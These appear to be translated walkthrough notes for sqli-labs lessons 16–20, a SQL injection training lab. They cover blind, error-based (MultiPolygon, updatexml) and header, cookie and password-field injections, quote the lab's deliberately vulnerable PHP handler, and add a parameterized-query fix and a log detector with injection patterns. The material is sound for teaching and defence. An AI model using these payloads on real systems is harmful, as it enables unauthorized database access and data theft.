1. lesson-16 Boolean-based or time-based blind injection
This is a string-type injection where the value is wrapped in a double quote plus a parenthesis.
Determining the injection type:
uname=ain") and sleep(3)%23&passwd=fin&submit=Submit
For the remaining steps, refer to lesson-2.
2. lesson-17 MultiPolygon() error-based injection
lesson-17 source code:
<?php
// including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value)) // check that the value is not empty
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc()) // true when magic quotes are on; they escape ' " and similar characters
    {
        $value = stripslashes($value); // remove the escaping backslashes from ' " etc.
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'"; // escapes ' " and similar characters
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);
    $passwd=$_POST['passwd']; // passwd is NOT passed through check_input
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; // raw $passwd concatenated into the query
        mysql_query($update);
        echo "<br>";
        // ... (remainder of the lab's handler is not reproduced in this excerpt)
    }
}
?>
uname is filtered with mysql_real_escape_string, so the SELECT built from uname is not injectable; however, uname must match an existing user, because only then does the UPDATE statement below run. The injection point is therefore the password position: a single-quote string-type injection into the UPDATE statement.
Determining the injection:
uname=admin&passwd=a'&submit=Submit
Query the database name:
uname=admin&passwd=a' and MultiPolygon((select * from(select * from(select database())a)b))-- +&submit=Submit
Query the table names:
uname=admin&passwd=a' and MultiPolygon((select * from(select * from(select group_concat(table_name) from information_schema.tables where table_schema='security')a)b))-- +&submit=Submit
Error-based injection depends on the MySQL version in which the function is available; on MySQL 5.5.29 all of the error-based injection functions work.
Reference article on the ten error-based injection functions:
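As an added illustration of why the escaping in check_input() protects the SELECT but not the UPDATE, and what the parameterized fix looks like, here is a Python reconstruction of the handler's two code paths. This is example code written for these notes, not part of sqli-labs or of the original write-up; it uses an in-memory SQLite database as a stand-in for the lab's MySQL 'security' database, a quote_literal() helper as an assumed stand-in for mysql_real_escape_string(), and a constructed admin row.

```python
import sqlite3


def setup_db():
    """In-memory SQLite stand-in for the lab's MySQL database (constructed sample row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'secret')")
    conn.commit()
    return conn


def quote_literal(value):
    """Stand-in for the lab's check_input(): wrap the value as a quoted SQL string.
    SQLite and MySQL both escape a single quote inside a literal by doubling it;
    assumption: this is close enough to mysql_real_escape_string for the point made here."""
    return "'" + value.replace("'", "''") + "'"


def vulnerable_login(conn, uname, passwd):
    """Mirrors the Less-17 handler: uname is escaped and quoted, passwd is
    concatenated raw into the UPDATE statement."""
    sql = "SELECT username, password FROM users WHERE username = " + quote_literal(uname) + " LIMIT 1"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "no such user"
    update = "UPDATE users SET password = '" + passwd + "' WHERE username = '" + row[0] + "'"
    try:
        conn.execute(update)
        conn.commit()
        return "updated"
    except sqlite3.OperationalError as err:
        # A database error surfacing here is exactly what an error-based probe looks for;
        # the fix is to keep user input out of the statement text, not to hide the message.
        return "sql error: " + str(err)


def safe_login(conn, uname, passwd):
    """Hardened form: both statements take the user values as bound parameters,
    so a quote in the password is stored as data rather than parsed as SQL."""
    row = conn.execute(
        "SELECT username, password FROM users WHERE username = ? LIMIT 1", (uname,)
    ).fetchone()
    if row is None:
        return "no such user"
    conn.execute("UPDATE users SET password = ? WHERE username = ?", (passwd, row[0]))
    conn.commit()
    return "updated"


def stored_password(conn, uname):
    """Read back the stored password so the effect of each path can be checked."""
    row = conn.execute("SELECT password FROM users WHERE username = ?", (uname,)).fetchone()
    return None if row is None else row[0]


if __name__ == "__main__":
    db = setup_db()
    print(vulnerable_login(db, "admin", "a'"))  # the lesson's probe breaks the UPDATE
    print(safe_login(db, "admin", "a'"))        # the same value is stored literally
    print(stored_password(db, "admin"))
```

The probe value a' from the lesson is enough to show the difference: the concatenated UPDATE fails to parse and leaks a database error, while the parameterized version simply stores the apostrophe. In the real lab the same fix is to move both queries to mysqli or PDO prepared statements and to pass passwd as a bound parameter instead of interpolating it.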
3. lesson-18 User-Agent header injection
A successful login is required before the injection is reachable.
After logging in successfully, the injection point turns out to be the User-Agent header; it is an injection into an INSERT statement.
Capture the request with Burp and send it to Repeater to determine the injection type; the User-Agent header closes with a single quote.
Query the current user:
Put the following into the User-Agent header:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '
4. lesson-19 Referer header injection
After logging in successfully, it turns out to be a Referer header injection.
Capture the request with Burp and query the current user.
Put the following into the Referer header:
1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '
5. lesson-20 Cookie injection
This is an injection into a DELETE statement.
After logging in successfully, the cookie turns out to be injectable.
Query the current user by putting the following into the cookie:
uname=admin' and updatexml(1,concat(0x7e,(select user()),0x7e),1)-- +
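The injection points in lessons 17 to 20 all sit in request fields that a web server rarely inspects: the password body field, User-Agent, Referer and the cookie. The following detector, added here as an example and not part of the original notes or of sqli-labs, flags requests that carry an error-based injection function call together with a quote-and-keyword or comment-terminator context in any of those fields. It assumes a constructed JSON-lines request log with the field names uname, passwd, user_agent, referer and cookie; the payload strings in the sample records are the ones from the lessons above.

```python
import json
import re

# MySQL functions used by error-based injection probes. MultiPolygon() and updatexml()
# are the ones the lessons above use; the others are the rest of the same well-known family.
ERROR_BASED_FUNCS = [
    "updatexml", "extractvalue", "floor", "exp", "geometrycollection",
    "multipoint", "polygon", "multipolygon", "linestring", "multilinestring",
]
FUNC_RE = re.compile(r"\b(" + "|".join(ERROR_BASED_FUNCS) + r")\s*\(", re.IGNORECASE)

# Second signal: a quote closing the original literal followed by AND/OR, or a comment
# terminator (-- + or # / %23). Requiring both signals keeps a benign "Polygon(" in a
# user agent or referer from alerting on its own.
CONTEXT_RE = re.compile(r"'\s*(?:and|or)\b|--\s*\+|#|%23", re.IGNORECASE)

# Request fields the lessons show as injection points (assumed field names in the log).
INSPECTED_FIELDS = ("uname", "passwd", "user_agent", "referer", "cookie")


def inspect_request(req):
    """Return (field, function) findings for one request record."""
    findings = []
    for field in INSPECTED_FIELDS:
        value = req.get(field) or ""
        hit = FUNC_RE.search(value)
        if hit and CONTEXT_RE.search(value):
            findings.append((field, hit.group(1).lower()))
    return findings


def scan_log(text):
    """Parse JSON-lines request records and return alerts as (ip, field, function)."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        req = json.loads(line)
        for field, func in inspect_request(req):
            alerts.append((req["ip"], field, func))
    return alerts


# Constructed sample records: one benign login, then the User-Agent, Referer, cookie and
# password probes shown in lessons 17 to 20.
SAMPLE_LOG = """\
{"ip":"10.0.0.5","uname":"admin","passwd":"admin","user_agent":"Mozilla/5.0","referer":"http://lab.example/Less-18/","cookie":"uname=admin"}
{"ip":"10.0.0.7","uname":"admin","passwd":"admin","user_agent":"1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '","referer":"http://lab.example/Less-18/","cookie":""}
{"ip":"10.0.0.7","uname":"admin","passwd":"admin","user_agent":"Mozilla/5.0","referer":"1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '","cookie":""}
{"ip":"10.0.0.9","uname":"admin","passwd":"admin","user_agent":"Mozilla/5.0","referer":"","cookie":"uname=admin' and updatexml(1,concat(0x7e,(select user()),0x7e),1)-- +"}
{"ip":"10.0.0.9","uname":"admin","passwd":"a' and MultiPolygon((select * from(select * from(select database())a)b))-- +","user_agent":"Mozilla/5.0","referer":"","cookie":""}
"""


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("%s: error-based injection probe in %s (%s)" % alert)
```

The two-signal rule is deliberate: function names such as exp or floor occur in legitimate text, so a match only counts when the same field also shows the quote-plus-keyword or comment-terminator shape that every payload on this page has. Because the lab's own error messages are what an error-based probe relies on, the same log-side check is also a good place to correlate with MySQL syntax errors emitted by the application.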